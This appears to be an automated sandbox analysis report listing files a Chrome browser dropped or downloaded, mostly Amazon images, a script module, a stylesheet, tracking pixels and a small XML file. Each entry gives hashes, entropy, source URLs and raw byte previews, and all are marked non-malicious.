                                                                                                                                                                                                        SHA1:72F98CDDE0225D2BAA6B49F6423C9DEA69C8F483
                                                                                                                                                                                                        SHA-256:2582D182D6FA8247E2D35FDC2A92A6CDA8D98121770861C8C33FB571365CD1E9
                                                                                                                                                                                                        SHA-512:9AD1A9703931983793686829614E6AC7448768B08B2C2420FDF83463FE6EF4B5EE7EFCEDC9F196B4696811887F34B2AD0CD09DA2B310E9C81338EEB5FE175B51
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.................................................................................................................................................................................................................j..".~u..4.}b..\.e........l.7...-..%8l/5.......Q}..j..'..).....8.............L.Z=]..Im.{|...A.>;.6...N...{-.......T5..T.o%.g*.'.j..|..&.#.3.*....F..V.z.z"................G.1..@..p...}M.........C......wT.T.Qxl..N....eb.U~*[...V...".Hd.%..P..........9...............^.&.5N;>.....R.fJ.......2....N..Z..!..he.9...........J5.63+.F.m..&..=..=.~9H.............]...w...?..'Bg.u....wm9.7Yr.YMb:.p.E;6...=...gey...y6....-....6.....7.0..t/>t..2.9..............k...z..I[]ZLrOZ.O\.uO8.8z.I..U..}.....^...=.....0..H..+...+.9....f.r...........0?..u...4.....K.Ir?]r?X.x.?...{..$jCM.Y.]....,...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):10496
                                                                                                                                                                                                        Entropy (8bit):7.845369460579096
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:JuhEiq5N4LL8ER/DHH40aq4fnmmtbcxE0XhNJjF3aK2I0zey2Ibd4:JuhEiq5C0E1H40aq4mmtqFXhzFq/zeyW
                                                                                                                                                                                                        MD5:B6FAAEE1594E50974942620A33E8CE79
                                                                                                                                                                                                        SHA1:D6276ED08530DB1623D70CD7289FF42D8741E60D
                                                                                                                                                                                                        SHA-256:4BB9BD341207D0CAC5A9F9FC90C61A63AC91C686EA7C3F6C46246D5BA44564C8
                                                                                                                                                                                                        SHA-512:755615819164BB887822163605C707BAF9ACFCC36D832D0364443272D40DE2DE92E6A4576E7B1440224CA720BAB5B403C10D7214795F55CBA0DAF85D8184EDF3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........0.............................................................,........................................................................................................{.{..#K.m.ko.n.Z..>W.z{...aX6.&...y..[..............y.{..."..+.-..YV...Z.q.7..~^n)...Ew$.....W..:.E.....%..*...............|...R.K..p..s.N.$...u5;...D......W=Q..f).......o6...z.u............<g..6......S.'..N...=...N.^oC.^n=".l=[..vE.F.m.....'.z.?..=M.p=....M............_....4........v........k3...........qY=..K.-.C..U...U...U..~..s..@...........|s._.F..:Y..Q.7..j...cr3+./_.....V.L.ZL./k.L.@V..Kr.R..../.R............<..?..45..J5.3S.b..&...."ni..v...o..52......69..F.w..E.]..W...y.@...........1.#..[..h.']A...*nx....."3H..+rs-....Y..R.n../.....:.G.}[.o..h...........<...p5+u8]Wi.h'...u}.)...d...].q7:..^..z....=.G.N...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (544)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2243
                                                                                                                                                                                                        Entropy (8bit):5.266863481297427
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:ZE3+F8d7jMMxU5ADpLPeaBBsPFOO0qTZk67KUTZ/UKpUBYIV:ZEOE3BVLPea0DpTZkyTZNi
                                                                                                                                                                                                        MD5:7802F6FC1955CADE889CCEB253C16029
                                                                                                                                                                                                        SHA1:F38F7FF9F7D2443F21590B3D9B4B5E8ADBF05167
                                                                                                                                                                                                        SHA-256:AA06AD40D619339C61E3B35B502111B035C03B51DEADB11A3539C9D8C4B08EF7
                                                                                                                                                                                                        SHA-512:20E6DD6C78BB5F54A87CC99F86484C5451FB6BEA51F2ADD3FFB8E580E096AD78DEB781310061881DECAEE1160EEB3BD542E42C9C3FFD1534CA6FA985C160B0FC
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:'use strict';mix_d("AmazonHomepageCielCards__ameyal-product-shoveler:ameyal-product-shoveler__Kvjfy9i1",["exports","tslib","@p/A","@c/metrics"],function(n,p,k,q){var f=k&&"object"===typeof k&&"default"in k?k:{"default":k},r={},m=function(c,g,e){void 0===g&&(g="");void 0===e&&(e=1);g=c+g;r.hasOwnProperty(g)||(r[g]=!0,q.count(c,(q.count(c)||0)+e))},w=function(c){m(f["default"].capabilities.mobile?"Card:EERU:SharedLib:mobile:render":"Card:EERU:SharedLib:desktop:render");var g=function(a,b){a={$event:{preventDefault:f["default"].$.noop,.stopPropagation:f["default"].$.noop},$target:a.getContent().find('[data-a-tab-name="'+b+'"]'),data:{name:"energyEfficiencyTabSet"}};f["default"].trigger("a:declarative:a-tabs:click",a)},e=function(a,b){var d=a&&a.$event,l=a&&a.data||{},u=l.activeTabName,v=l.modalHeight,t=l.name;d&&d.preventDefault&&d.preventDefault();d&&d.stopPropagation&&d.stopPropagation();d=b.get(t);d||(f["default"].on("a:popover:beforeShow:"+t,function(h){h.popover&&h.popover.getContent
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):59849
                                                                                                                                                                                                        Entropy (8bit):7.9719454048172675
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:AV/K8PMmwETLFFJn2vkNrgVmZIud0DSnZSe7+P:G/KQwETLdnW8rgVK0Dk8e7+P
                                                                                                                                                                                                        MD5:987E3DDAC3D34C5724954BEFFD75D52E
                                                                                                                                                                                                        SHA1:884F33C5CE2BE7E8B52CAC1311B89E138C378AE7
                                                                                                                                                                                                        SHA-256:9BA31014F9F97F405BCD46F9EA2CC124F7EEDDB7E0FE7AE579C37F5099C50D30
                                                                                                                                                                                                        SHA-512:973057698AF356A56D1BB6CE83797EF91FB76AB5E941014640058108BCFD269C0006A9866B2D0D7DEC7096531F2076135CEDC68D8D09B479E61C87AF29E2C5E8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF......................................................................................................................................................................<..................................................................................X..0...@.WoQ.....q..g.>?uK.....}[...&.Y?0.....................X{.dX......yG.........^..r...BJ.C.s.:................Q."...s.I.w8..........3;.I.s............<~...!....^.............d.h.$.............:V?..v.ef .9..........e.....u...........2e....Y..}...........R...;'.r.M.@.........47.R?........q.-<#vQz_goA.S:.K."...B.hX...?....Z..3}y|.?y|...8K...@.....Y..-.a............~.G...ox.)Y.w.-........... |...}U...o.0...K)....#H....D./"!...........?....].sgF?./..........W........Pd...E.y.i>p..&,.S.uG`...#.Y.P.Yr..............B.b.-/.:.f...,p..')XVG.p..........F.....@....}..&H.M.@..:.4.+#Ps{..{........]}.....v.l.V.v9.F..O....}.k...........!...B..}.B....0.....Y..8.._ .......4...=.>.W`.>.6...2|..xd...}.&.e...y.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 145x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):3076
                                                                                                                                                                                                        Entropy (8bit):7.876345042072062
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0rmwYN1kpTrLvvvKaORyPFmtl8j+KT/AGyASNsCtNaeH7F88d2fkUKv2J3lscX:TzN1kpjUyE6ToGyANebF+seXscDT
                                                                                                                                                                                                        MD5:C75E02A77BCA6C29B06FD72B498E2DE5
                                                                                                                                                                                                        SHA1:C1041D5789652AF895F73E846DDFBD6E61244602
                                                                                                                                                                                                        SHA-256:CFA95B85E4091DDEA25312C89FAA28306DBDD539C13A6DBC8D432891EB0471FD
                                                                                                                                                                                                        SHA-512:AFD88E377B2B7895F59762464FA9CD21959179EBF373FA693F9CC012471556E532186D0C55F317123795937C9A4F2E94E6E864540B887ED240328EDDC5C06A87
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcar_b07pcm7ds2_379x304_ae-en._SY116_CB623005780_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t....".................................................................!1."A2QRabq.B......#34c..$Sr.................................................1.!...."2AQb............?...*\..(..(..(..(../Y..8?i.'XP..z.......Pj....x...|f...+N.Ad.8...M8...H.....H.Fa..~.VL3$....".....[.ea.A....JR.JR.JR.JR.JR.JR.JR.Q.9...?K.Qu.&BA..,..g.A.z...!W.5B.|i.Y.%...X.N.m..x.{3.O.O."./A../...Z..4.]......EO..*.{....u..E...E..,......*GJlf.&.M..{....d~..LA..a.....5.r...k...c.&..!..<....._.@/..\r.r..K....KG......%...su..=....)J.)J.)J.)J.)J.)_..5g.."+.v8TU......M...:.i.&.Ct.....+h..........4..&..q.=...\.K.L...m...-`..G.]........[..E.xSL....H..n.7.L....t.....4.iJ.[....V`.p....{u.c....e..%..i..4/t...33/.....;..x.Mn{.w.W.../..U".+......-]....3....7..|....s]T.p{...+..)JP)JP)JP)JP)JP*....in.a='C-.~....8...2..$.6...>...d6....A...{..Mg^.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1728
                                                                                                                                                                                                        Entropy (8bit):7.662619798175388
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0rmPEUbjgO77v5Ug0cMTwISsp6uCvyqcJPXo:T/PEQjgO77viqQzSE6LCVXo
                                                                                                                                                                                                        MD5:8C5FB563EDCD5BB267C114CB7786E748
                                                                                                                                                                                                        SHA1:D7309CA3D79A7C221A87A0ECA8734A8A2975EA75
                                                                                                                                                                                                        SHA-256:264771BA24B7852D1F9213320C050A028FB078287492E50F827BDA9A3BF05AE4
                                                                                                                                                                                                        SHA-512:1EA244E7D7B57D9C7A9C94065252BE57056E0A3EBE2C34C97C09C9D831F2C6BBC89709563DD944CD1896FC52C5FC3132BB08E5AC36BAB00D259B1125BAD80816
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!...1AQa"q2....R...#dr..BS..............................................!A1............?.............P3X...[..x.(ZK.y..I.[c.....$u%0...O/.1...\.....R...h.x....o.....S.....#.::..~...1...W.S."(." ""." ""." -@.h.>..Kp..............y.~.E.._.=+.}......%$.9..fK..jI=..\j$%.^|....x.U..a..]p`uc.. ...V~..v._Kh...^......x`..v...x#.A..;..r ..=.1--[..t...i^Z6...(...._.lv..Nr.,.=..,q......<..p..<.......DD.D@DD.D@DD.M>...8.E.2>e....-.+.WV.('....7..4`.y.|..w.OQ)..=.y.!/?NJ.+b8D_..I3s..)d.Z.v...'5.l.......)+./...1M.H...)..ew&S.O..8...0...}6.q..9v.......6..#.....g.xVJ..c..).E.............R..""." ""." "-.......N...$..6.v....X>*.61.uz.t.......V.k....m.m.......L....).s....mR.d.K.\X...F.k..;...G..T... ....K.`..5...jTK.6.c...J.+.:.2.W.S..x.....E..(..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 218x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):6677
                                                                                                                                                                                                        Entropy (8bit):7.928041400684103
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TLyuSkj/fopjoByb5W1cRFgIP0yFQQbeT+Kizvvm/CEnvNbic8v3k:nyLkj/8oIY1c8CGaE+LDmKEvNMv0
                                                                                                                                                                                                        MD5:B67176D9736FB8BDB5C9DD13A10E4806
                                                                                                                                                                                                        SHA1:CA00B5655EC5FD8034F1DE9A7265451668B0A935
                                                                                                                                                                                                        SHA-256:86413077F06423DE4CB690F69A32245634A386D586F0D17664EF39BD6622F949
                                                                                                                                                                                                        SHA-512:7975D6D31FEB8CD7BA73A3FB931D6EE58D14F41D5382CCBAB45604450C2F1BFAC6FA2BAE5F2BF41B053F05E84B18C85AA775EA297ADB17C9C627605C9C192E60
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..............................................................!..1..AQ."2aq..Br....#3CRSb..$.4....%D..........................................................?..R..R..R..R..R..R.+....O.p..q...:..@|......i]..<..g......l$Y.t.....r.v..c+M%.Z.^..../...n...Z$x..g;.....=@.M^../s.$>.{1..O.....N.iz<v~.y..3..yl..|.A.......G.A....}.@.t.#K.7}.c.f.:.G5p.^..U.P..2.vKp....Io...$..;.@..;^..f...&..]........pE.....?;.[.[.[....~...c.L<5......w..V......Q..c0.8`.$.z...[.z.l.V..$..gF.U... .A..(..(..(..(..(..(..(..(..(..F=......f..n...v!...ot_....W...f.D.;.>'u..r..~.?..V.......L.?....>..._...if...34.;.wf<...rX.I..;Ha^...'....r:...q.FGLz......w..Z....$.BG..w8Q...*.h.j.\j.;.y...b.../....@H...rE..*t...}bj.8;.....Pf/x<.....[.T.#E,.n&.V..Ph....>d....C....9>..q.C.../..|.g5..:.P..{XG..f?y.......q8..9.8.2..e...+.9.;.VR.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:B82A0YC1SM3B4A82DCGS$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3DB82A0YC1SM3B4A82DCGS%26ctb%3D1%26m%3D1%26sc%3DB82A0YC1SM3B4A82DCGS%26pc%3D4280%26at%3D4280%26t%3D1723729112260%26csmtags%3Dcsm-feature-touch-enabled%3Afalse%26pty%3Di18n-preferences-web%26spty%3DsubSelectPreferences%26pti%3Dundefined%26tid%3DB82A0YC1SM3B4A82DCGS%26aftb%3D1%26lob%3D1:4280
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 1500x600, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):33246
                                                                                                                                                                                                        Entropy (8bit):6.850698176268014
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:U3FL8i7aqQWb8E9VFgTBKfsQQsvpg+gRZWvCrGkQUFwEi4cVvhrzPWMlxI6qV0g6:QFUfzECTgxmtrG0Ih3PXxIAgTG+xxuT
                                                                                                                                                                                                        MD5:0FFD22517A39416843D685EA48FC3488
                                                                                                                                                                                                        SHA1:FDB5DC6546057F00639B0C5985107F8C6843E141
                                                                                                                                                                                                        SHA-256:ED87A3758C95C13C999730AC43C8AAD16EAC5E397475724D15563E2EB345F25C
                                                                                                                                                                                                        SHA-512:FC499A60EC0337EDB8C47F881E4F085AC30585EE5119A525D66D24A4BF2F2EFCC568702DCC3579414A04FBC703A055190B31FD84E52F5FF335712F106F31CE9E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..............Exif..II*...............4IJP........4?jumb....jumdc2pa.........8.q.c2pa...4.jumb...Gjumdc2ma.........8.q.urn:uuid:30e8ecf4-3ac9-4de5-bb55-b713f6cf7836.....jumb...)jumdc2as.........8.q.c2pa.assertions.....jumb...&jumdcbor.........8.q.c2pa.actions.....cbor.gactions..factionkc2pa.editedmsoftwareAgentmAdobe FireflyqdigitalSourceTypexShttp://cv.iptc.org/newscodes/digitalsourcetype/compositeWithTrainedAlgorithmicMedia....jumb...(jumdcbor.........8.q.c2pa.hash.data....|cbor.jexclusions..estart..flength.4Kdnamenjumbf manifestcalgfsha256dhashX ....7..:.a4.~I..Y*..."u.B...-..cpadI.............jumb...$jumdc2cl.........8.q.c2pa.claim.....cbor.hdc:titleoGenerated imageidc:formatjimage/jpegjinstanceIDx(xmp.iid:A4DEEE94472B11EF8FE8FE57D3F77758oclaim_generatorx7Adobe_Photoshop/25.12.0 adobe_c2pa/0.9.3 c2pa-rs/0.31.0tclaim_generator_info..dnameoAdobe Photoshopgversiong25.12.0.isignaturex.self#jumbf=c2pa.signaturejassertions..curlx'self#jumbf=c2pa.assertions/c2pa.actionsdhashX J
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):101
                                                                                                                                                                                                        Entropy (8bit):4.797524201274186
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:vFWWMNHU8LdgCfrQjktARAd8WJBp+den:TMVBd/rztAbSBpce
                                                                                                                                                                                                        MD5:51DF8D57D5CE1BF02A297A81C5B9CE80
                                                                                                                                                                                                        SHA1:2E9C201D1B04194F1FEA5035A8737F69691925C5
                                                                                                                                                                                                        SHA-256:2EDE778E67F79D88F8D2F0C33E6E9312FB23ED631AC9D9A2382F61F84756A700
                                                                                                                                                                                                        SHA-512:D68A926986DC5F146F73BAA5C84DFBAE31BE9D396A1E806FBFDADC9741537D3FC6E8A265AB845FC8399EFFCAA90C4469AD3A4F60EF177811781B4E9CCFCE2400
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://foxloc.com.br/0/index.xml
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8"?>..<?xml-stylesheet type="text/xsl" href="index.xslt"?>..<root/>
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4731), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):4731
                                                                                                                                                                                                        Entropy (8bit):4.744963557049678
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:0G8IGTZzH0kiqCwuzN/1N+N7UN8PAN8PsNNMLnv9NNV/iN8Qfdi74N1LF/6LeSXM:FiZPd2F6Ttn0dE48L/XwezC+MEBUOIZ
                                                                                                                                                                                                        MD5:4C963AF08F09E104A73BDC501337153E
                                                                                                                                                                                                        SHA1:6F331955D91E83A76055ED778E080E6BFCA9A236
                                                                                                                                                                                                        SHA-256:137BC641B42C459670A52CA7705DA6ECF6BB96ADF58C46DB9824100585F56222
                                                                                                                                                                                                        SHA-512:149EF9BB3DC6FA88CA14CD0589EC1CAD6253FF15FF386DD59F1F517117FCAFB567CBD1164956956AF5E3DA8C3DDD678E696420459357D946037AD6B2D69DD548
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/I/21erbSjwfKL.css?AUIClients/CartExperienceGridViewAsset
                                                                                                                                                                                                        Preview:.sc-grid-view:not(.sc-grid-full-width) .sc-list-body .sc-coupon-wrapper{display:flex;justify-content:center}.sc-grid-view:not(.sc-grid-full-width) .sc-list-body .sc-coupon-details-spacing{padding:0 3px;width:auto}.sc-grid-view:not(.sc-grid-full-width) .sc-list-body .sc-clipcoupon{float:none!important;margin:auto}.sc-grid-view form{width:100%;overflow:hidden}.sc-grid-view .sc-list-body .sc-list-item{border:1px solid #E7E7E7;padding:12px}.sc-grid-view .sc-list-body .dibs-utterance-info{white-space:normal!important}.sc-grid-view .sc-list-body .sc-list-item-checkbox{margin-top:0!important;margin-bottom:8px}.sc-grid-view:not(.sc-grid-full-width) .sc-list-body .sc-action-separator{display:none}.sc-grid-view:not(.sc-grid-full-width) .sc-list-body .sc-action-links{display:flex;flex-direction:column}.sc-grid-view:not(.sc-grid-full-width) .sc-list-body .sc-action-links>[data-action]{display:block;margin-bottom:4px}.sc-grid-view:not(.sc-grid-full-width) .sc-list-body .sc-action-links .sc-action-s
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:V0ARH6GWVSW29RT7ZWDG$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.295223.0%26id%3DV0ARH6GWVSW29RT7ZWDG%26sw%3D1280%26sh%3D1024%26vw%3D1263%26vh%3D907%26m%3D1%26sc%3DV0ARH6GWVSW29RT7ZWDG%26ue%3D4%26bb%3D1327%26ns%3D1367%26ne%3D1575%26cb%3D1583%26x2%3D1584%26x3%3D1597%26cf%3D1598%26af%3D1602%26fn%3D1603%26be%3D1714%26fp%3D1515%26fcp%3D1515%26pc%3D8125%26tc%3D-1068%26na_%3D-1068%26ul_%3D-1723729132210%26_ul%3D-1723729132210%26rd_%3D-1723729132210%26_rd%3D-1723729132210%26fe_%3D-1065%26lk_%3D-1034%26_lk%3D-1034%26co_%3D-1034%26_co%3D-312%26sc_%3D-1033%26rq_%3D-311%26rs_%3D-32%26_rs%3D262%26dl_%3D-26%26di_%3D1757%26de_%3D1758%26_de%3D1758%26_dc%3D8124%26ld_%3D8124%26_ld%3D-1723729132210%26ntd%3D-1%26ty%3D0%26rc%3D0%26hob%3D3%26hoe%3D4%26ld%3D8125%26t%3D1723729140335%26ctb%3D1%26rt%3Dcf%3A17-0-14-3-2-1-0_af%3A17-0-14-3-2-1-0_ld%3A47-21-14-4-7-1-1%26pty%3DShoppingCart%26spty%3DCart%26pti%3Dundefined%26tid%3DV0ARH6GWVSW29RT7ZWDG%26aftb%3D1%26lob%3D1:8133
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 145x116, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3797
                                                                                                                                                                                                        Entropy (8bit):7.881039660211951
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TGJ7EfmSd0v7z76jNIdlg7nSCLjSi/Bi0x:NeVTX0+du7n/Si/l
                                                                                                                                                                                                        MD5:E482CC010EF6C50060678CBA607948A3
                                                                                                                                                                                                        SHA1:D061AB5EB899A329AD2BE1191A65ED79C617403D
                                                                                                                                                                                                        SHA-256:9F8248EE5B817A4A2BEF16A82D199C1157E2FB90587BC61209C12AD257FCB60E
                                                                                                                                                                                                        SHA-512:50F98A7957028068EA595E55E0E7D1F7492172B770F81EBC24E590889E3F69CF657548AE5068CF05FD5DE7B243813C0C16DACADA45F01F3FD1841D3F98BCCA39
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!1..AQ."aq...2R....#Bbr...3CS...%..TU...............................................!1..A.............?....Z=..0...0:p...:.M.H..e?O......F$........nJ.q*r.....>{.~..K.g5..x..,..R3 E.~..SF/f.....-.q.^...WB..H[!VO.....?.Q.!E..p)..Z.p..0R._..'.e..4....n..C'...r:.4.+.....,IP......h.....[..g>C.NSP....+.....yQ.w.. .##..+...........\@..j.Ow9...#..I....x.x2..Ek..u[.L........F...p.h..~........s.Ti..|..k.v.K@.^.=..~t...N.q.^@.....F^B|.wn&.r.....|..B..q...+.\..R.*x\.L5..Q....`.r..p2T..U.r.`D<...9....C\..4......x.!.*..t.p|.P.SN.X.... .%H.c*.>$...~.o.~t....W*....*3..'.....&.cQ..fFG....=..4.+...%....T.....=.hU.V..r.....n.|.m..E.*p.d;F.O.g<..5...hGP.6.<~.W.....~.N..[..V..?.(d.d8..R..S.*..C.f...........z..b./L.=.fo#S..5..x..........N.....|j.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1500x600, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):87837
                                                                                                                                                                                                        Entropy (8bit):7.953630479953133
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:bt/NqZoNHOqgTdz9H8RGETvddW43+EhsuH7NlQL9aj19Fhg6MBtP1gPx:btbH6BpCFdWRgsuH7fQL961Fg6MBvgPx
                                                                                                                                                                                                        MD5:D91426A67AAE5FF31496DBCB1001391F
                                                                                                                                                                                                        SHA1:93CD02958C43EAB096454D8350E523703878D822
                                                                                                                                                                                                        SHA-256:8255F2BB5C5AB763BFADE0D6D7BB9E35F03462E08AA3BC9FBFFEE35EF1D0F06A
                                                                                                                                                                                                        SHA-512:6FF0317988C6D48E674B0BD37038B5BA85CF59860B3DBC4C099ECE990B81016376DA63B6FF9D2959441D39BF6370EC3B12367AB187DAF89ABB1D1D892D6D6851
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/61kZarhXuuL._SX1500_.jpg
